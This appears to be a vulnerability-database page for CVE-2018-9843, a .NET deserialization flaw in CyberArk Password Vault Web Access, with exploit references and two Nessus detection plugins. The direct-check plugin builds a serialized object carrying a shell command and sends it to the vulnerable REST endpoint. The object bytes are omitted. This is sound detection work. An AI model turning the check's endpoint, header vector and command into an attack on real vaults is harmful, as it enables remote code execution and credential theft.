CVE-2018-9843 - Deserialization of Untrusted Data vulnerability in Cyberark Password Vault 10.0
Attack vector | NETWORK |
Attack complexity | LOW |
Privileges required | NONE |
Confidentiality impact | HIGH |
Integrity impact | HIGH |
Availability impact | HIGH |
Summary
The REST API in CyberArk Password Vault Web Access before 9.9.5 and 10.x before 10.1 allows remote attackers to execute arbitrary code via a serialized .NET object in an Authorization HTTP header.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
Application | | 2 |
Common Weakness Enumeration (CWE)
Exploit-Db
description | CyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution. CVE-2018-9843. Webapps exploit for JSON platform |
file | exploits/json/webapps/44429.txt |
id | EDB-ID:44429 |
last seen | 2018-05-24 |
modified | 2018-04-09 |
platform | json |
port | |
published | 2018-04-09 |
reporter | Exploit-DB |
source | https://www.exploit-db.com/download/44429/ |
title | CyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution |
type | webapps |
Nessus
NASL family | CGI abuses |
NASL id | CYBERARK_PASSWORD_VAULT_9_9_5.NASL |
description | The version of CyberArk Password Vault Web Access running on the remote host is prior to 9.9.5, 9.10.x prior to 9.10.1, or is version 10.1. It is, therefore, vulnerable to a remote code execution vulnerability. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number. |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 108952 |
published | 2018-04-10 |
reporter | This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/108952 |
title | CyberArk Password Vault Web Access .NET Object Deserialization |
code

```
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(108952);
  script_version("1.10");
  script_cvs_date("Date: 2019/10/07 15:15:27");

  script_cve_id("CVE-2018-9843");
  script_bugtraq_id(105180);
  script_xref(name:"IAVB", value:"2018-B-0121");

  script_name(english:"CyberArk Password Vault Web Access .NET Object Deserialization");
  script_summary(english:"Looks for the product and version in the logon page.");

  script_set_attribute(attribute:"synopsis", value:
"An Identity Management application running on the remote host is
affected by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of CyberArk Password Vault Web Access running on the remote
host is prior to 9.9.5, 9.10.x prior to 9.10.1, or is version 10.1. It
is, therefore, vulnerable to a remote code execution vulnerability.

Note that Nessus has not tested for this issue but has instead relied
only on the application's self-reported version number.");
  # https://www.redteam-pentesting.de/en/advisories/rt-sa-2017-014/-cyberark-password-vault-web-access-remote-code-execution
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e1d84c64");
  script_set_attribute(attribute:"solution", value:
"Upgrade to CyberArk Password Vault 9.9.5, 9.10.1, 10.2 or Later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-9843");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2018/04/09");
  script_set_attribute(attribute:"patch_publication_date", value:"2018/02/28");
  script_set_attribute(attribute:"plugin_publication_date", value:"2018/04/10");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:cyberark:password_vault");
  script_set_attribute(attribute:"stig_severity", value:"I");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("cyberark_password_vault_detection.nbin");
  script_require_keys("Settings/ParanoidReport");
  script_require_ports("Services/www", 80, 443);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("vcf.inc");
include("vcf_extras.inc");

# Version-only check: only run when the scan is configured for paranoid reporting
if (report_paranoia < 2) audit(AUDIT_PARANOID);

port = get_http_port(default:80);
app = vcf::get_app_info(app:"CyberArk Password Vault Web Access", webapp:TRUE, port:port);

# Affected version ranges; each entry is [min_version, fixed_version)
constraints = [
  {"min_version" : "0.0.0",  "fixed_version" : "9.9.5"},
  {"min_version" : "9.10.0", "fixed_version" : "9.10.1"},
  {"min_version" : "10.1",   "fixed_version" : "10.2"}
];

vcf::check_version_and_report(app_info:app, constraints:constraints, severity:SECURITY_HOLE, strict:FALSE);
```
NASL family | CGI abuses |
NASL id | CYBERARK_PVWA_CVE-2018-9843.NASL |
description | The CyberArk Password Vault Web Access running on the remote host is affected by a remote code execution vulnerability due to unsafe deserialization of a .NET object. An unauthenticated, remote attacker can exploit this, via a crafted .NET object, to execute arbitrary .NET code in the context of the IIS server. |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 110287 |
published | 2018-06-01 |
reporter | This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/110287 |
title | CyberArk Password Vault Web Access .NET Object Deserialization (Direct Check) |
code

```
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(110287);
  script_version("1.5");
  script_cvs_date("Date: 2019/10/07 15:15:27");

  script_cve_id("CVE-2018-9843");
  script_bugtraq_id(105180);

  script_name(english:"CyberArk Password Vault Web Access .NET Object Deserialization (Direct Check)");
  script_summary(english:"Sends a .NET object to trigger an error message.");

  script_set_attribute(attribute:"synopsis", value:
"An Identity Management application running on the remote host is
affected by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The CyberArk Password Vault Web Access running on the remote host is
affected by a remote code execution vulnerability due to unsafe
deserialization of an .NET object. An unauthenticated, remote attacker
can exploit this, via a crafted a .NET object, to execute arbitrary
.NET code in the context of the IIS server.");
  # https://www.redteam-pentesting.de/en/advisories/rt-sa-2017-014/-cyberark-password-vault-web-access-remote-code-execution
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e1d84c64");
  script_set_attribute(attribute:"solution", value:
"Upgrade to CyberArk Password Vault Web Access 9.9.5, 9.10.1, 10.2 or Later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-9843");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2018/04/09");
  script_set_attribute(attribute:"patch_publication_date", value:"2018/02/28");
  script_set_attribute(attribute:"plugin_publication_date", value:"2018/06/01");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:cyberark:password_vault");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("cyberark_password_vault_detection.nbin");
  script_require_keys("installed_sw/CyberArk Password Vault Web Access");
  script_require_ports("Services/www", 80, 443);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");

app = 'CyberArk Password Vault Web Access';

# Plugin will exit if app is not detected on host
get_install_count(app_name:app, exit_if_zero:TRUE);

# Plugin will exit if app is not detected on this port
port = get_http_port(default:80);
install = get_single_install(app_name:app, port:port, exit_if_unknown_ver:FALSE);

url = "/PasswordVault/WebServices/PIMServices.svc/Applications/?Location=\&IncludeSublocations=true";

cmd = 'ping -n 3 localhost';
# vuln verification
#cmd = 'dir > c:\\Windows\\Temp\\hacked.txt';
cmd = '/c ' + cmd;

# Serialized .NET object that PVWA deserializes from the Authorization header.
# The original plugin builds it from raw_string() byte literals with
# mkword(strlen(cmd)) + cmd spliced into the middle; the byte dump itself is
# omitted from this listing.
obj = raw_string(
  # ... serialized object bytes omitted ...
) + mkword(strlen(cmd)) + cmd + raw_string(
  # ... serialized object bytes omitted ...
);

# PVWA can be slow to respond
http_set_read_timeout(30);

token = base64(str: obj);

res = http_send_recv3(
  port        : port,
  method      : 'GET',
  item        : url,
  add_headers : make_array('authorization', token),
  content_type: 'application/json',
  fetch404    : TRUE,
  exit_on_fail: TRUE
);

if (isnull(res[2]))
  audit(AUDIT_RESP_NOT, port, 'a GET request: No data in the response body');

#
# Patched:
#   403
#   {"ErrorCode":"CAWS00001E","ErrorMessage":"Connection to the Vault was terminated."}
#
if (res[2] !~ "Unable to cast object of type.* to type 'CyberArk.Services.Web.SessionIdentifiers")
{
  audit(AUDIT_INST_VER_NOT_VULN, app, install['version']);
}

#
# Vulnerable:
#   403
#   {"ErrorCode":"CAWS00001E","ErrorMessage":"Error raised while trying to establish session using session token provided. Error: Unable to cast object of type 'System.Collections.Generic.SortedSet`1[System.String]' to type 'CyberArk.Services.Web.SessionIdentifiers'."}
#
report =
  '\nNessus was able to detect the .NET deserialization vulnerability by' +
  '\nsending a crafted .NET object.' +
  '\n';

security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);
```
Packetstorm
data source | https://packetstormsecurity.com/files/download/147105/rt-sa-2017-014.txt |
id | PACKETSTORM:147105 |
last seen | 2018-04-10 |
published | 2018-04-09 |
reporter | redteam-pentesting.de |
source | https://packetstormsecurity.com/files/147105/CyberArk-Password-Vault-Web-Access-Remote-Code-Execution.html |
title | CyberArk Password Vault Web Access Remote Code Execution |
The Hacker News
id | THN:A7F528F861EE01F1A3D095D085EDB80F |
last seen | 2018-04-09 |
modified | 2018-04-09 |
published | 2018-04-09 |
reporter | Mohit Kumar |
source | https://thehackernews.com/2018/04/enterprise-password-vault.html |
title | Critical Code Execution Flaw Found in CyberArk Enterprise Password Vault |
References
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2017-014/-cyberark-password-vault-web-access-remote-code-execution
- http://seclists.org/fulldisclosure/2018/Apr/18
- https://www.exploit-db.com/exploits/44429/
- http://www.securitytracker.com/id/1040675
- http://www.securityfocus.com/archive/1/541932/100/0/threaded